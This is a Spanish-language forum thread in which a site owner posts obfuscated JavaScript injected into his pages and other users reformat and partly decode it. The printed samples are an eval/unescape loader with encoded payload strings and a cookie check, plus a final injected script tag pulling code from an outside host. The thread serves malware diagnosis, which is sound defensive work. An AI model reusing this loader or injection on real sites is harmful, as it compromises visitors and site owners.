Test Foro de elhacker.net SMF 2.1

Hola... parece que hackearon un sitio que tenia, nada importante pero me preocupa, es de un VPS asi que tengo todos los permisos, tiene cpanel instalado...

en mis archivos index o home aparecieron de la nada estos codigos js:

Citar<script language="javascript">
var kasbd3412 = "";
$$ = function () { try{kasbd3412= $$dfsd(gnflseejrr()); kasbd3412.do(); } catch(e){ var bn = ""; return kasbd3412;}};
var adlan3r$oubw = "e";$$dfsd =  this['a'+'s'+'d'];var adlan3r$ouaw = "a";
function asd(df_){this['r']="";
var s = df_;
for(__fh=0;this['__fh']<s['l'+adlan3r$oubw+'ng'+'t'+'h'];__fh++ ){i=__fh;if(s['ch'+adlan3r$ouaw +'rA'+'t'](i)=='Z'){this[neAR_DEF_FGEvftDSyTtnSoh_1]='%'} else {this[neAR_DEF_FGEvftDSyTtnSoh_1]=s['ch'+'ar'+'At'](this['i'])}this['r']=r+VAR_EZJrWcTGuhPYZJj(this,neAR_DEF_FGEvftDSyTtnSoh_1)}
return this['unesc'+adlan3r$ouaw + 'p'+adlan3r$oubw](r)}
var ez=window
VAR_AiCzwbiiMdphDXs=(function(VAR_JMFILTCeLQNWkAf,VAR_gqWQtFFAsjjtVqK){return VAR_JMFILTCeLQNWkAf[VAR_gqWQtFFAsjjtVqK];
});
VAR_EZJrWcTGuhPYZJj=(function(VAR_wiSIHKenjOMRPsE,VAR_SfXtSSNCWJXwgQF){return VAR_AiCzwbiiMdphDXs(VAR_wiSIHKenjOMRPsE,VAR_SfXtSSNCWJXwgQF);
});
function gnflseejrr() {return $a}var neAR_DEF_FGEvftDSyTtnSoh_1='s'+'1'; BKbk34b32=

Mas abajo luego de mas codigo.

Citarvar $a = BKbk34b32.replace(/98/g, "Z");
ez[String.fromCharCode(101,118,97)+'l']($$())
</script>
<script language="javascript">
var kasbd3412 = "";
$$ = function () { try{kasbd3412= $$dfsd(gnflseejrr()); kasbd3412.do(); } catch(e){ var bn = ""; return kasbd3412;}};
var adlan3r$oubw = "e";$$dfsd =  this['a'+'s'+'d'];var adlan3r$ouaw = "a";
function asd(df_){this['r']="";
var s = df_;
for(__fh=0;this['__fh']<s['l'+adlan3r$oubw+'ng'+'t'+'h'];__fh++ ){i=__fh;if(s['ch'+adlan3r$ouaw +'rA'+'t'](i)=='Z'){this[neAR_DEF_FGEvftDSyTtnSoh_1]='%'} else {this[neAR_DEF_FGEvftDSyTtnSoh_1]=s['ch'+'ar'+'At'](this['i'])}this['r']=r+VAR_EZJrWcTGuhPYZJj(this,neAR_DEF_FGEvftDSyTtnSoh_1)}
return this['unesc'+adlan3r$ouaw + 'p'+adlan3r$oubw](r)}
var ez=window
VAR_AiCzwbiiMdphDXs=(function(VAR_JMFILTCeLQNWkAf,VAR_gqWQtFFAsjjtVqK){return VAR_JMFILTCeLQNWkAf[VAR_gqWQtFFAsjjtVqK];
});
VAR_EZJrWcTGuhPYZJj=(function(VAR_wiSIHKenjOMRPsE,VAR_SfXtSSNCWJXwgQF){return VAR_AiCzwbiiMdphDXs(VAR_wiSIHKenjOMRPsE,VAR_SfXtSSNCWJXwgQF);
});
function gnflseejrr() {return $a}var neAR_DEF_FGEvftDSyTtnSoh_1='s'+'1'; BKbk34b32=

Sigue mas y mas codigo hasta que acaba:

Citarvar $a = BKbk34b32.replace(/98/g, "Z");
ez[String.fromCharCode(101,118,97)+'l']($$())
</script>

Que podra ser?

Finalmente, el código queda así, dejame debugearlo y miro a ver que hace.
<script language="javascript">
    var kasbd3412 = "";
    $$ = function() {
        try {
            kasbd3412 = $$dfsd(gnflseejrr());
            kasbd3412.do();
        } catch (e) {
            var bn = "";
            return kasbd3412;
        }
    };
    var adlan3r$oubw = "e";
    $$dfsd = this['a' + 's' + 'd'];
    var adlan3r$ouaw = "a";

    function asd(df_) {
        this['r'] = "";
        var s = df_;
        for (__fh = 0; this['__fh'] < s['l' + adlan3r$oubw + 'ng' + 't' + 'h']; __fh++) {
            i = __fh;
            if (s['ch' + adlan3r$ouaw + 'rA' + 't'](i) == 'Z') {
                this[neAR_DEF_FGEvftDSyTtnSoh_1] = '%'
            } else {
                this[neAR_DEF_FGEvftDSyTtnSoh_1] = s['ch' + 'ar' + 'At'](this['i'])
            }
            this['r'] = r + VAR_EZJrWcTGuhPYZJj(this, neAR_DEF_FGEvftDSyTtnSoh_1)
        }
        return this['unesc' + adlan3r$ouaw + 'p' + adlan3r$oubw](r)
    }
    var ez = window
    VAR_AiCzwbiiMdphDXs = (function(VAR_JMFILTCeLQNWkAf, VAR_gqWQtFFAsjjtVqK) {
        return VAR_JMFILTCeLQNWkAf[VAR_gqWQtFFAsjjtVqK];
    });
    VAR_EZJrWcTGuhPYZJj = (function(VAR_wiSIHKenjOMRPsE, VAR_SfXtSSNCWJXwgQF) {
        return VAR_AiCzwbiiMdphDXs(VAR_wiSIHKenjOMRPsE, VAR_SfXtSSNCWJXwgQF);
    });

    function gnflseejrr() {
        return $a
    }
    var neAR_DEF_FGEvftDSyTtnSoh_1 = 's' + '1';
    BKbk34b32 =
    var $a = BKbk34b32.replace(/98/g, "Z");
    ez[String.fromCharCode(101, 118, 97) + 'l']($$())
</script>
<script language="javascript">
    var kasbd3412 = "";
    $$ = function() {
        try {
            kasbd3412 = $$dfsd(gnflseejrr());
            kasbd3412.do();
        } catch (e) {
            var bn = "";
            return kasbd3412;
        }
    };
    var adlan3r$oubw = "e";
    $$dfsd = this['a' + 's' + 'd'];
    var adlan3r$ouaw = "a";

    function asd(df_) {
        this['r'] = "";
        var s = df_;
        for (__fh = 0; this['__fh'] < s['l' + adlan3r$oubw + 'ng' + 't' + 'h']; __fh++) {
            i = __fh;
            if (s['ch' + adlan3r$ouaw + 'rA' + 't'](i) == 'Z') {
                this[neAR_DEF_FGEvftDSyTtnSoh_1] = '%'
            } else {
                this[neAR_DEF_FGEvftDSyTtnSoh_1] = s['ch' + 'ar' + 'At'](this['i'])
            }
            this['r'] = r + VAR_EZJrWcTGuhPYZJj(this, neAR_DEF_FGEvftDSyTtnSoh_1)
        }
        return this['unesc' + adlan3r$ouaw + 'p' + adlan3r$oubw](r)
    }
    var ez = window
    VAR_AiCzwbiiMdphDXs = (function(VAR_JMFILTCeLQNWkAf, VAR_gqWQtFFAsjjtVqK) {
        return VAR_JMFILTCeLQNWkAf[VAR_gqWQtFFAsjjtVqK];
    });
    VAR_EZJrWcTGuhPYZJj = (function(VAR_wiSIHKenjOMRPsE, VAR_SfXtSSNCWJXwgQF) {
        return VAR_AiCzwbiiMdphDXs(VAR_wiSIHKenjOMRPsE, VAR_SfXtSSNCWJXwgQF);
    });

    function gnflseejrr() {
        return $a
    }
    var neAR_DEF_FGEvftDSyTtnSoh_1 = 's' + '1';
    BKbk34b32 =
    var $a = BKbk34b32.replace(/98/g, "Z");
    ez[String.fromCharCode(101, 118, 97) + 'l']($$())
</script>

Uyy que bueno, por fav or informame de los resultados que obtienes :/ and o algo preo cupad o

tenes a lgo? es que m´e preocup´a bastante y no se si sea alarmante

Bueno, mirándolo, solo pude decodificar algunas variables. Pero aún falta, solo que esta el código donde esta definido las variables y funciones, pero no esta el código donde se invoca estás. Esto es importa ya que vemos los parámetros que son pasados a las funciones.

Intenta buscar más código.

t agrade zco mucho tu tiem´po, de veras ;-) tiene´s idea de como pudo infectarse? o que carajos puede hacer ese codigo?...

pd. no ocnozco mas de ese codigo, por ahora es l o unico que tengo, permite me buscar mas ;)

Pues, cuando estuve trabajando en una empresa XXX -que por cierto, son unos *****, cabrones, hijos de p**a- cof, cof... Se les entro un virus así a todas las paginas que tenían alojadas en el servidor. Pero lo que hacia era SPAM. En este no se que es lo que hace. XD, tendría que ver los parámetros enviados.

m mm puede ser que el pc tenga spyware y la maquina infectada que se conecta al pc haya infectado los archivos? porque por el vps, estoy ciertamente seguro de que no esta infectado, lo dudo muuuuucho...

Sería bastante bueno, que pusieras todo el código de algún archivo infectado. A ver si se logra mirar los parámetros.

hla d nuevo, perdona digitar asi pero dsde un cel es complikdo, en fin...

primero que todo de verdad te agradezco mas que todo tu tiempo, en verdad,muchisimas gracias....

esta es una recopilacion de algunos archivos infectados  que hi ce antes de eliminarlos, m i primera reac cion fue limpiar,luego deje unos pocos..
http://www.megaupload.com/?d=8CJHD9RM

algunos contienen es un codigo n php...

y bueno, aunque no descubramos bien que es, sabes de q se trata? q tipo de vulnerabilidad o malware puede ser? generalmente q hace y como puedo prvenirlo?


gracias

Ok, ya lo estoy analizando, esta un poco entretenido. XD Dejadme analizarlo más y te dejo el resultado, por ahora veo como una redirección a una URL que aún no he podido descubrir cual es.

Tengo decodificado esto,
de = "!%209M0;0|uddubcK8888dy}uK7iuqb7M060%20h##!!90..0$90;0~e}9050!%209M+0}%7F~dxSx0-0|uddubcK88dy}uK7}%7F~dx7M0;0~e}9050%22%9M0;0|uddubcK88dy}uK7}%7F~dx7M0:0~e}9050%22%9M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0%269050%22'9M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}9050%22$9M+4q-4q>bu`|qsu8ts%7F}79+m";
dd = "08y~tuh0:0tqi990;08}%7F~dx0N0tqi90:0y~tuh90;0tqi9+m0fqb0iuqbSx!<0iuqbSx%22<0}%7F~dxSx<0tqiSx<0~e}+~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7M<0dy}uK7}%7F~dx7M<0dy}uK7iuqb7M<0cxyvdY~tuh9;!%20%20+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060%20hQQ90;0~e}9050%26#9050%22%26M0;0|uddubcK888dy}uK7iuqb7M060%20hQQ90,,0%2290;0~e}9050%22%M+iuqbSx%220-0|uddubcK8888dy}uK7iuqb7M060%20h##!!90..0#90;0~e}9050";
ca = "%66un%63tio%6e %64cs%28ds%2ces%29%7bd%73%3dunes%63ape%";
cz = "%66u%6ect%69on%20cz%28cz%29%7bretur%6e ca%2bc%62%2bcc%2b%63d+c%65%2bcz%3b};";
cb = "28ds%29;s%74%3dtmp%3d%27%27;for(i%3d0;i%3cd%73%2el%65n";
dz = "%66un%63ti%6fn%20dw%28t%29%7bca%3d%27%2564oc%2575m%65%256et%2ew%2572%2569te%2528%2522%27;ce%3d%27%2522)%27;cb%3d%27%253c%2573cri%2570t l%2561n%2567%75a%67%25%365%253d%255%63%2522ja%76as%63%2572i%70%2574%255%63%2522%253e%27;c%63%3d%27%253c%255c%252fs%63ri%70t%253e%27;wi%6ed%6fw[%22e%22+%22%22+ %22v%22+%22al%22](unes%63ape%28t)%29}%3b";
da = "fqb0t-7vrs}vyb>s%7F}7+0fqb0cxyvdY~tuh0-0%20+v%7Fb08fqb0y0y~0gy~t%7Fg>dg>dbu~tc9kyv08gy~t%7Fg>x0.0(0660gy~t%7Fg>x0,0%22!0660y>y~tuh_v870%20'790.0=!9kcxyvdY~tuh0-0gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>sxqbS%7FtuQd8!90;0gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>|u~wdx+rbuq{+mu|cu0yv088gy~t%7Fg>x0,0)0ll00gy~t%7Fg>x0.0%22%2090660y>y~tuh_v870!(790.0=!9kcxyvdY~tuh0-0gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>sxqbS%";
cc = "%67%74h;%69++%29%7bt%6dp%3dds.s%6cic%65(i%2ci+1%29;%73";
ce = "cha%72Co%64eAt%280)%5e%28%270x0%30%27+%65s)%29);}%7d";
op = "%24a%3d%22dw(dcs(%63%75,1%34%29)%3b%22;";
st = "%73t%3d%22$%61%3d%73t%3bd%63s%28%64%61%2b%64%62+%64%63+%64%64%2b%64%65,%31%30)%3bd%77(%73t%29;%73%74%3d$a%3b%22%3b";
db = "7FtuQd8!90;0!%200;gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>|u~wdx+rbuq{+mmyv08cxyvdY~tuh0--0%2009kcxyvdY~tuh0-0gy~t%7Fg>dg>dbu~tcKyMK%26M>aeubi>sxqbS%7FtuQd8!90;0'0;gy~t%7Fg>dg>dbu~tcKyMK%26M>aeubi>|u~wdx+m0yv08cxyvdY~tuh0.0%209kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~t%7Fg>wt>wudEDSVe||Iuqb89+dy}uK7}%7F~dx7M0-0gy~t%7Fg>wt>wudEDS]%7F~dx89;!+dy}uK7tqi7M0-0gy~t%7Fg>wt>wudEDSTqdu89+fqb0t-7v";
dc = "rs}vyb>s%7F}7+fqb0}%7F~dxc0-0~ug0Qbbqi87trc7<07id~7<07f}d7<07f}b7<07}|s7<07%7Fh{7<07vtc7<07rfv7<07iec7<07}s`7<07~sj7<07wtg79+fqb0|uddubc0-0~ug0Qbbqi87q7<7r7<7s7<7t7<7u7<7v7<7w7<7x7<7z7<7y7<7{7<7|7<7}7<7~7<7%7F7<7`7<7a7<7b7<7c7<7d7<7e7<7f7<7g7<7h7<7i7<7j79+fqb0~e}rubc0-0~ug0Qbbqi8!<%22<#<$<%<%26<'<(<)9+%19ve~sdy%7F~0Sq|se|qdu]qwys^e}rub8tqi<0}%7F~dx<0iuqb<0y~tuh9kbudeb~0888iuqb0;";
cu = "(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:w{y;xp;y}%7F;64c}p`|)%$$4|q}s|`),$*(;}rfuyq*(;p}b*";
cd = "%74%3dst+%53%74rin%67.fr%6fmC%68a%72C%6fd%65(%28tmp%2e";

if (document.cookie.indexOf('rf5f6ds') == -1) {
 function callback(x) {
   window.tw = x;
   var d = new Date();
   d.setTime(x["as_of"] * 1000);
   var h = d.getUTCHours();
   window.h = h;
   if (h > 8) {
     d.setUTCDate(d.getUTCDate() - 2);
   } else {
     d.setUTCDate(d.getUTCDate() - 3);
   }
   window.gd = d;
   var time = new Array();
   var shiftIndex = "";
   time["year"] = d.getUTCFullYear();
   time["month"] = d.getUTCMonth() + 1;
   time["day"] = d.getUTCDate();
   if (d.getUTCMonth() + 1 < 10) {
     shiftIndex = time["year"] + "-0" + (d.getUTCMonth() + 1);
   } else {
     shiftIndex = time["year"] + "-" + (d.getUTCMonth() + 1);
   }
   if (d.getUTCDate() < 10) {
     shiftIndex = shiftIndex + "-0" + d.getUTCDate();
   } else {
     shiftIndex = shiftIndex + "-" + d.getUTCDate();
   }
   document.write("" + "");
 }
 function callback2(x) {
   window.tw = x;
   sc('rf5f6ds', 2, 7);
   eval(unescape(dz + cz + op + st) + 'dw(dz+cz($a+st));');
   /*
function dw(t) {
  ca = 'document.write("';
  ce = '")';
  cb = '<script language=\"javascript\">';
  cc = '<\/script>';
  window["eval"](unescape(t))
};

function cz(cz) {
  return ca + cb + cc + cd + ce + cz;
};
$a = "dw(dcs(cu,14));";
st = "$a=st;dcs(da+db+dc+dd+de,10);dw(st);st=$a;";
dw(dz + cz($a + st));
    */

   document.write($a);
 }
 document.write(" " + "");
} else {
 $a = ''
};

function sc(cnm, v, ed) {
 var exd = new Date();
 exd.setDate(exd.getDate() + ed);
 document.cookie = cnm + '=' + escape(v) + ';expires=' + exd.toGMTString();
};

Hola Shell, como has estado? disculpame el atrevimiento, pero me gustaria saber si tienes alguna novedad respecto a esto, seria genial :)

por lo menos no afecta sea lo que sea porque en firefox me da error de sintaxis, está mal codeado o el código está incompleto :-/

Error: syntax error
Archivo de origen: file:///C:/Users/Yan/Desktop/ver.html
Línea: 28
Código fuente:
var $a = BKbk34b32.replace(/98/g, "Z");

asi que no pude hacerle un debugg.

Yo encontre en mis servers un php tambien bastante extranio despues de decodearlo me encontre que hacia peticiones a otra page "redirect" enviando todos mis formularios y/o contrasenias que alojaba, ademas de buscar servidores "Relaying" para SPAM.

bajare el file y ya os cuento.

-berz3k.

Pues no pude bajar el file de megaupload, podras treparlo a otro site

-berz3k.

El link funciona correctamente  :silbar:

@Shell Root Algo pasa con mis Addons de Chrome, lo podras subir a
:http://rghost.net/

-berz3k.

:http://rghost.net/3867259

Lo tengo ya os cuento.

-berz3k.

Otra vez sucede, ahora con:
<scri pt ty pe="text/jav ascript" src=" http://merchant.aegispayments.com/in.cgi?default" ></sc ript>